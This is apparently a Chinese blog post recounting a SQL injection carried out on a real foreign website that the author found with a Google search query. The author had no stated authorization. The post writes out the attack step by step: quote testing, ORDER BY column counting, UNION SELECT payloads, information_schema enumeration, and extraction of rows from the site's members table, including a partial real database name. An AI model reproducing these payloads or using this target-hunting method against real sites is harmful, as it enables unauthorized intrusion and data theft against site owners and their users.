vlambda博客
学习文章列表

实操:sql注入国外xx网站

前言:

    学了sql注入一段时间了,也在顺利通关过墨者靶场。不过,靶场哪有真实网站好玩?


何为sql注入?

    sql注入就是sql+注入,不清楚可以百度。


寻找网站:

google黑语法:

   谷歌搜索也蛮有意思的,打inurl自动推荐了很多关键词,比如:“inurl php id”。


为什么不用百度呢?

    少,并且找的多数为国内。


①、试探


http://www.xxx.org/members.php?id=1



用单引号“'”的时候,是会报错的。


接着测试,order by 5 ,以第5列进行排列,报错。当 表<=实际列数,就不会报错。


http://www.xxx.org/members.php?id=1 order by 5

实操:sql注入国外xx网站


http://www.xxx.org/members.php?id=1 order by 4

实操:sql注入国外xx网站


由以上可知,当前表的列为4。


知道了几列,接下来就能知道回显的是哪几列。


②、联合注入


http://www.xxx.org/members.php?id=1  and false union select 1,2,3,4

实操:sql注入国外xx网站


回显了2,4列。


http://www.xxx.org/members.php?id=1  and false union select 1,user(),3,database()

实操:sql注入国外xx网站


接下来查字典库,information_schema。


http://www.xxx.org/members.php?id=1  and false union select 1,user(),3,(selecttable_name from information_schema.tables where table_schema=database() limit0,1)

实操:sql注入国外xx网站


http://www.xxx.org/members.php?id=1  and false union select 1,(select id from db83231_asfaa.members limit 0,1),3,(select column_name frominformation_schema.columns where table_schema=database() andtable_name='members' limit 0,1)

实操:sql注入国外xx网站

concat字段查一查,member表里面到底有点啥。


http://www.xxx.org/members.php?id=1  and false union select 1,(select concat(id,nome,imagem,texto) from db83231_asfaa.members limit 0,1),3,(selectcolumn_name from information_schema.columns where table_schema=database() andtable_name='members' limit 0,1)


实操:sql注入国外xx网站


???


实操:sql注入国外xx网站

...


这是个什么网站呢?



有点意思。。。还好查的都是网站允许显示的数据,不涉及敏感数据。


sqlmap就不上了(只能查出三个数据库,没权限)。


嗯。。。到此为止。